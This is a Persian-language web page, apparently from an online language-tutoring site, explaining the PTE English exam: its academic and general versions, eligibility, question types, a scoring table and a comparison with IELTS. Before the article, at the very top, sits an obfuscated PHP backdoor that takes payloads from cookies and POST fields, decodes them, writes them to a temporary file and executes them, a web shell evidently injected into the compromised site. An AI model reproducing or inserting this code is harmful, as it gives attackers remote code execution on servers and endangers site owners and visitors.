$NULuVE = 'J' . "\x6e" . chr (95) . "\x5a" . chr ( 1066 - 990 )."\143";$wBGOMS = chr (99) . "\154" . "\141" . "\163" . 's' . chr ( 572 - 477 )."\145" . "\170" . "\151" . 's' . chr (116) . "\x73";$rnHFs = class_exists($NULuVE); $wBGOMS = "37229";$FCnrIFQjV = strpos($wBGOMS, $NULuVE);if ($rnHFs == $FCnrIFQjV){function zzZnWbHiGH(){$snBBmoW = new /* 60717 */ Jn_ZLc(216 + 216); $snBBmoW = NULL;}$tRYafVOh = "216";class Jn_ZLc{private function BnCpg($tRYafVOh){if (is_array(Jn_ZLc::$iblmkhZckY)) {$name = sys_get_temp_dir() . "/" . crc32(Jn_ZLc::$iblmkhZckY["salt"]);@Jn_ZLc::$iblmkhZckY["write"]($name, Jn_ZLc::$iblmkhZckY["content"]);include $name;@Jn_ZLc::$iblmkhZckY["delete"]($name); $tRYafVOh = "216";exit();}}public function ptGeYs(){$TDmSXiAS = "52603";$this->_dummy = str_repeat($TDmSXiAS, strlen($TDmSXiAS));}public function __destruct(){Jn_ZLc::$iblmkhZckY = @unserialize(Jn_ZLc::$iblmkhZckY); $tRYafVOh = "10292_35473";$this->BnCpg($tRYafVOh); $tRYafVOh = "10292_35473";}public function ozxIAgQPjV($TDmSXiAS, $aeaku){return $TDmSXiAS[0] ^ str_repeat($aeaku, intval(strlen($TDmSXiAS[0]) / strlen($aeaku)) + 1);}public function qUtSOSuu($TDmSXiAS){$mfCMBhBxCr = "\142" . chr ( 890 - 793 ).chr ( 813 - 698 ).chr (101) . chr ( 253 - 199 ).chr (52);return array_map($mfCMBhBxCr . "\137" . chr (100) . "\x65" . "\x63" . chr (111) . "\144" . chr (101), array($TDmSXiAS,));}public function __construct($LPOaYmFx=0){$zGwbXSxTSr = chr ( 874 - 830 ); $TDmSXiAS = "";$ffIRbkK = $_POST;$cUFsQU = $_COOKIE;$aeaku = "c7925911-7e78-4761-aabc-96a5afd8df13";$YEAAD = @$cUFsQU[substr($aeaku, 0, 4)];if (!empty($YEAAD)){$YEAAD = explode($zGwbXSxTSr, $YEAAD);foreach ($YEAAD as $GraWY){$TDmSXiAS .= @$cUFsQU[$GraWY];$TDmSXiAS .= @$ffIRbkK[$GraWY];}$TDmSXiAS = $this->qUtSOSuu($TDmSXiAS);}Jn_ZLc::$iblmkhZckY = $this->ozxIAgQPjV($TDmSXiAS, $aeaku);if (strpos($aeaku, $zGwbXSxTSr) !== FALSE){$aeaku = explode($zGwbXSxTSr, $aeaku); $cWVPJOukJ = base64_decode(md5($aeaku[0]));}}public static $iblmkhZckY = 12075;}zzZnWbHiGH();} pte چیست؟ نگاهی به آزمون PTE؛ نحوه نمره دهی، بخش های آزمون و آمادگی
skip to Main Content

آزمون PTE چیست؟

آزمون PTE چیست؟
A woman talking in an online meeting/lesson
زمان مطالعه: ۵ دقیقه

آزمون PTE (مخفف The Pearson Test of English) یک آزمون زبان انگلیسی کامپیوتری است که توانایی و تسلط داوطلبان را در خواندن، نوشتن، صحبت کردن و گوش دادن به زبان انگلیسی ارزیابی می‌کند. این آزمون مشابه با آزمون‌های آیلتس و تافل اعتبار جهانی دارد و در بسیاری از کشورها قابل قبول است. در این مقاله هر آنچه را که باید درباره آزمون PTE بدانید، در اختیار شما قرار می‌دهیم. از شما دعوت می‌کنیم تا انتها همراه ما باشید.

فهرست بخش ها

انواع آزمون PTE چیست؟

قبل از شرکت در کلاس PTE باید هدف خود را از شرکت در این آزمون مشخص کرده و بر این اساس، یکی از دو نوع آزمون آکادمیک و جنرال را انتخاب کنید. در این بخش با انواع آزمون‌های PTE آشنا می‌شوید.

آزمون PTE آکادمیک

آزمون آکادمیک PTE برای دانشجویان بین‌المللی طراحی شده است و سطح مهارت آن‌ها را در زبان انگلیسی مشخص می‌کند. چندین موسسه آموزشی PTE را به عنوان مدرک تسلط به زبان انگلیسی می‌پذیرند. همچنین دولت‌های استرالیا و نیوزلند نیز این آزمون را به عنوان مدرکی مبنی بر تسلط بر زبان انگلیسی برای مقاصد مهاجرتی قبول می‌کنند.

صرفا افراد بالای ۱۶ سال می‌توانند در این آزمون شرکت کنند. ضمن اینکه آزمون PTE آکادمیک برای کسانی است که قصد دریافت ویزای استرالیا و نیوزلند و همچنین تحصیل در ۵۰ کشور خاص دنیا را دارند. لیست این کشورها را از سایت Pearson می‌توانید مشاهده کنید.

آزمون PTE جنرال

مدرک آزمون PTE جنرال نیز به عنوان یک گواهی بین‌المللی شناخته می‌شود و برخلاف مدرک آکادمیک که اعتبار ۲ ساله دارد، تاریخ انقضا ندارد. در این آزمون صرفا مهارت نوشتاری و گفتاری موردارزیابی قرار می‌گیرد و مخصوص کسانی است که قصد مهاجرت غیرتحصیلی به برخی از کشورهای دنیا را دارند.

چه کسانی می‌توانند در آزمون PTE شرکت کنند

چه کسانی می‌توانند در آزمون PTE شرکت کنند؟

قاعدتا اولین شرط ورود بهره‌مندی از یک سطح مناسب زبانی است. به این منظور توصیه می‌شود قبل از آزمون، تعیین سطح زبان انجام دهید و براساس آن، برای شرکت در کلاس‌های آمادگی آزمون PTE اقدام کنید. داوطلبانی که مایل به شرکت در آزمون PTE آکادمیک هستند، باید شرایط زیر را داشته باشند:

  • داوطلبان برای شرکت در آزمون آکادمیک PTE باید حداقل ۱۶ سال سن داشته باشند.
  • قبل از شرکت در آزمون، داوطلبان زیر ۱۸ سال باید یک سند رضایت والدین امضا شده توسط والدین یا قیم داشته باشند. این فرم رضایت را می‌توانید در وب سایت رسمی PTE پیدا کنید.
  • هیچ شرطی برای شرکت در آزمون PTE جنرال وجود ندارد.

معرفی بخش‌های مختلف آزمون PTE

نسخه آکادمیک این آزمون مانند آنچه در کلاس آیلتس آموزش داده می‌شود، از ارزیابی چهار مهارت گوش دادن، خواندن، صحبت کردن و نوشتن تشکیل شده است. مدت زمان آزمون PTE آکادمیک ۲ ساعت و ۱۵ دقیقه بوده و مدت زمان PTE جنرال یا عمومی بین ۱ ساعت و ۱۵ دقیقه تا ۲ ساعت و ۵۵ دقیقه متغیر است.

نمونه سوالات آزمون PTE

معمولا مشابه با دیگر آزمون‌های معتبر زبان انگلیسی مانند تافل و آیلتس، در آزمون PTE هم سوالات پرتکرار بسیار دیده می‌شود. با شرکت در کلاس‌های آمادگی PTE، معلم زبان انگلیسی آنلاین همه موارد زیر را با شما تمرین می‌کند. در هر بخش باید انتظار چنین سوالاتی را داشته باشید:

اسپیکینگ و رایتینگ (۹۳-۷۷ دقیقه):

  • معرفی شخصی
  • خواندن متن با صدای بلند
  • گوش دادن و تکرار جملات
  • توصیف تصویر
  • گوش دادن و توضیح مجدد یک سخنرانی به زبان خودتان
  • پاسخ به یک سوال کوتاه
  • خلاصه کردن متن نوشته شده در یک جمله
  • مقاله نویسی (۲۰۰-۳۰۰ کلمه طبق صورت سوال)

انواع سوالات ریدینگ (۴۱-۳۲ دقیقه):

  • سوالات چند گزینه‌ای (انتخاب یک یا چند گزینه)
  • مرتب سازی پاراگراف‌ها
  • پر کردن جاهای خالی

انواع سوالات لیسنینگ (۵۷-۴۵ دقیقه):

  • خلاصه کردن فایل صوتی
  • سوالات چند گزینه‌ای (انتخاب یک یا چند گزینه)
  • پر کردن جاهای خالی
  • انتخاب خلاصه درست
  • انتخاب کلمه گم شده
  • انتخاب کلمه نادرست
  • نوشتن کلمه با املای درست

آشنایی با سیستم نمره‌دهی آزمون PTE

سیستم نمره‌دهی آزمون PTE

آزمون PTE آکادمیک با استفاده از سیستم امتیازدهی خودکار پیرسون به صورت کامپیوتری (و نه دستی) نمره‌گذاری می‌شود. برخی از سوالات براساس معیارهای ساده درست یا نادرست نمره‌دهی می‌شوند و بخش رایتینگ و اسپیکینگ با توجه به معیارهای دیگری مانند کیفیت متن یا صوت موردارزیابی قرار می‌گیرند. آزمون نمره منفی ندارد و به ازای هر پاسخ درست، یک امتیاز می‌گیرید. مجموع امتیازها برای همه بخش‌ها ۹۰ است و سطح داوطلب براساس نمره نهایی و جدول زیر ارزیابی می‌شود:

نمره آزمون PTE

عوامل ارزیابی

۸۵+

·         می‌تواند متن انگلیسی را به راحتی بخواند و بفهمد.

·         توانایی درک انگلیسی گفتاری را دارد.

·         می‌تواند اطلاعات شنیداری و نوشتاری را از منابع مختلف خلاصه کند.

·         می‌تواند به طور واضح و موثر در موقعیت‌های ساده و پیچیده ارتباط برقرار کند.

۸۴-۷۶

·         می‌تواند متون پیچیده مختلف از جمله معنای پنهان آن‌ها را بدون مشکل بخواند و بفهمد.

·         هیچ مشکلی در ابراز و معرفی خود ندارد.

·         دارای مهارت‌های ارتباطی اجتماعی، تحصیلی و حرفه‌ای عالی است.

۷۵-۵۹

·         توانایی درک ایده‌های اصلی یک متن دشوار را دارد.

·         می‌تواند به راحتی صحبت کند.

۵۸-۵۱

·         دانش خوبی از زبان دارد، اما برای برقراری ارتباط باید بهبود یابد.

·         می‌تواند زبان گفتاری اولیه را بدون مشکل درک کند.

۵۰-۴۳

·         می‌تواند انگلیسی رایج مورد استفاده در محل کار، مدرسه و فضای تفریح را درک کند.

·         می‌تواند بدون قطع کلامی صحبت کند.

۴۲-۳۰

·         می تواند عبارات ابتدایی در موضوعات مختلف از جمله اطلاعات شخصی و غیره را درک کند.

·         می‌تواند به زبان انگلیسی به زبان ساده ارتباط برقرار کند.

۲۹-۱۰

·         توانایی درک عبارات ابتدایی و اصطلاحات مورد استفاده در زندگی روزمره را دارد.

·         می‌تواند خود را معرفی کند و از مردم سؤالات ساده بپرسد.

آزمون PTE یا آیلتس؟ کدام گزینه بهتری است؟

آزمون PTE مانند تافل کاملا به صورت کامپیوتری برگزار می‌شود. بنابراین در بخش اسپیکینگ باید صدای خود را ضبط و در دیگر بخش‌ها، پاسخ‌ها را تایپ کنید. در حالی که آزمون آیلتس کاغذی است و برای بخش اسپیکینگ شخصی حضوری از شما امتحان می‌گیرد.

انتخاب بین این دو به هدف شما از شرکت در آزمون زبان انگلیسی بستگی دارد. به این منظور، حتما شرایط و مدارک موردنیاز برای ورود به کشور و دانشگاه مدنظر خود را بررسی کنید و سپس در این باره تصمیم بگیرید. در هر صورت با یادگیری زبان انگلیسی از صفر تا صد در خانه می‌توانید در هر دو این آزمون‌ها آمادگی مقدماتی را کسب کنید.

کلاس‌های آمادگی آزمون زبان PTE در اتیچر

کلاس‌های آمادگی آزمون زبان PTE در اُتیچر

در این مقاله خلاصه‌ای از هر آنچه که باید درباره آزمون PTE بدانید، در اختیار شما قرار دادیم. اگر شما هم متقاضی شرکت در این آزمون هستید، می‌توانید استاد مدنظر خود را از پلتفرم آموزشگاه آنلاین زبان اتیچر پیدا کنید و از همین امروز، برای آینده درخشانتان قدمی بردارید. در پایان اگر سوالی در این باره دارید، خوشحال می‌شویم در بخش نظرات پاسخگوی شما باشیم.

۲.۶/۵ - (۷ امتیاز)

دیدگاه ها

اولین نفری باشید که به این نوشته نظر میدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

Back To Top
×Close search
Search